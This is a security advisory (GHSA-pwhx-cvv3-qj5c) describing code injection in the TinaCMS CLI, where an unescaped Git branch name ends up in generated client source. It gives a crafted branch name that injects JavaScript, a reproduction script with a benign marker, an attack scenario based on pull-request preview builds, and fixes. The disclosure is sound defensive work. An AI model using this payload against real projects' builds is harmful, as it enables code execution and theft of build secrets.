Vulnerability GHSA-pwhx-cvv3-qj5c
Summary
Tina: Code injection via unescaped Git branch name in generated client source
Details
Summary
@tinacms/cli inserts the raw Git branch value into the generated client.ts source without escaping or encoding. A Git-valid branch name can close the string literal and inject an arbitrary JavaScript expression that executes when the consumer build imports the generated client module.
Affected component
- Source (branch read):
packages/@tinacms/cli/src/cmds/init/templates/config.tslines 155–172 — readsVERCEL_GIT_COMMIT_REF,GITHUB_BRANCH, orHEADintoconfig.branch - Transform (URL build):
packages/@tinacms/cli/src/next/codegen/index.tslines 219–253 —_createApiUrl()concatenates the raw branch into the API URL with noencodeURIComponent - Sink (template):
packages/@tinacms/cli/src/next/codegen/index.tslines 363–381 —genClient()interpolates the URL intourl: '${apiURL}' - Sibling sink:
packages/@tinacms/cli/src/next/codegen/codegen/plugin.tsline 55 —url: "${apiURL}"(same pattern, double quotes)
Root cause
The codegen template at index.ts:376 uses:
url: '${apiURL}'
where apiURL contains the raw branch name. No JSON.stringify, encodeURIComponent, or string-escape function is applied at any point in the pipeline. A single quote in the branch name closes the string literal and allows expression injection.
Payload
The following is a valid Git branch name (git check-ref-format accepts it):
x'+(globalThis.__TINA_PROBE='hit')+'
Generated source (sink)
When codegen runs with this branch, the generated client.ts contains:
export const client = createClient({
url: 'https://content.tinajs.io/2.4/content/<clientId>/github/x'+(globalThis.__TINA_PROBE='hit')+'',
token: '<token>',
queries,
});
The ' in the branch name closes the URL string. +(globalThis.__TINA_PROBE='hit')+ is parsed as a JavaScript expression. The trailing +' reopens a string to keep the syntax valid.
Steps to reproduce
Prerequisites: Node.js, Git, npm
mkdir /tmp/tinacms-repro && cd /tmp/tinacms-repro
git init && git commit --allow-empty -m "init"
git branch "x'+(globalThis.__TINA_PROBE='hit')+'"
npm init -y && npm install esbuild
Create repro.mjs:
import { transform } from 'esbuild';
import vm from 'vm';
// Simulate VERCEL_GIT_COMMIT_REF containing the malicious branch
const branch = "x'+(globalThis.__TINA_PROBE='hit')+'";
// _createApiUrl() logic from index.ts:252
const apiURL = `https://content.tinajs.io/2.4/content/my-client/github/${branch}`;
// genClient() template from index.ts:376
const generated = `
import { createClient } from "tinacms/dist/client";
export const client = createClient({ url: '${apiURL}', token: 'xxx' });
`;
console.log("Generated source:\n", generated);
// Compile (same as consumer build)
const compiled = await transform(generated, { loader: 'ts', format: 'cjs' });
// Execute in sandboxed VM
const sandbox = {
globalThis: {},
module: { exports: {} },
exports: {},
require: () => ({ createClient: (o) => o }),
};
vm.createContext(sandbox);
vm.runInContext(compiled.code, sandbox);
console.log("__TINA_PROBE =", sandbox.globalThis.__TINA_PROBE);
// Output: __TINA_PROBE = hit
Run: node repro.mjs
Result: globalThis.__TINA_PROBE is set to 'hit', confirming the injected expression executed during module evaluation.
Negative control: Repeating with branch = "feature/safe-branch" does not trigger injection.
Impact
The injected expression executes with the full privileges of the consumer build process. In a typical Vercel or GitHub Actions preview deployment:
- Build environment variables are accessible (
process.env), which may includeNPM_TOKEN,VERCEL_TOKEN, cloud provider secrets, and API keys - Build artifacts can be modified, enabling supply-chain compromise of the deployed output
- Network access is available to exfiltrate data
Attack scenario: An attacker opens a pull request to any open-source project that uses TinaCMS with preview deployments enabled (Vercel auto-deploys every PR branch). The attacker's branch name contains the payload. The preview build runs Tina codegen, generates the injected client.ts, and the attacker's code executes during the build.
Preconditions:
- Attacker can create a branch or PR that triggers a consumer build
- Consumer uses TinaCMS with the scaffolded branch config (reading from
VERCEL_GIT_COMMIT_REFor equivalent) - Tina SDK codegen is enabled (default)
Severity rationale
High — build-time arbitrary code execution via a controlled Git ref. Critical was not claimed because no real secret exfiltration or release artifact tampering was demonstrated in this proof; only a benign marker was used.
Suggested fix
- Use
JSON.stringify(value)to safely serialize any runtime value interpolated into generated source templates - Apply
encodeURIComponent()to the branch value before constructing the API URL path segment - Apply the same treatment to
apiURL,token,errorPolicy,cacheDir, and the siblingAddGeneratedClientFunctemplate inplugin.ts - Consider moving runtime values out of source templates entirely — pass them through a JSON config file that the generated client reads at runtime
Related advisory
GHSA-4936-9hrh-qqpw — TinaCMS Forestry migration generated-source RCE. Different source (Forestry YAML labels), different parser (__TINA_INTERNAL__ unquoting helper), and different sink (tina/templates.ts). This report is not a duplicate.
Related Vulnerabilities
Other vulnerabilities affecting the same packages